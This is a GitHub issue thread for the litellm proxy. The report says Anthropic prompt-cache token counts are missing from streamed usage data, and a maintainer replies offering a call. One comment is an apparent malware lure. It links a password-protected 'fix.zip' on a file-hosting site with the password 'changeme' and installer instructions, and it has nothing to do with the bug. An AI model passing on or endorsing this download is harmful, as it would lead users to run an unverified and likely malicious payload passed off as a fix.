### ISSUE TITLE
[Bug]: Cache usage information missing when streaming from Anthropic

### ISSUE THREAD

**Issue by Penagwin** [BerriAI/litellm#5364]
### What happened?

`cache_creation_input_tokens` and `cache_read_input_tokens` are not added to the usage information when streaming from Anthropic.

I use the proxy and tested the main branch 4d29c1fb6941e49191280c4fd63961dec1a1e7c5

They were added to the non-streaming endpoint, [see here](https://github.com/BerriAI/litellm/blob/4d29c1fb6941e49191280c4fd63961dec1a1e7c5/litellm/llms/anthropic.py#L776)

However, they are missing when using `"streaming":true` and `"stream_options":{"include_usage": true}`.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ishaan-jaff** [comment]
Hi @Penagwin , curious do you use LiteLLM Proxy in production today If so, I'd love to hop on a call and learn how we can improve LiteLLM for you

- my cal for your convenience: https://calendly.com/d/4mp-gd3-k5k/litellm-1-1-onboarding-chat
- my linkedin if you prefer DMs: https://www.linkedin.com/in/reffajnaahsi/
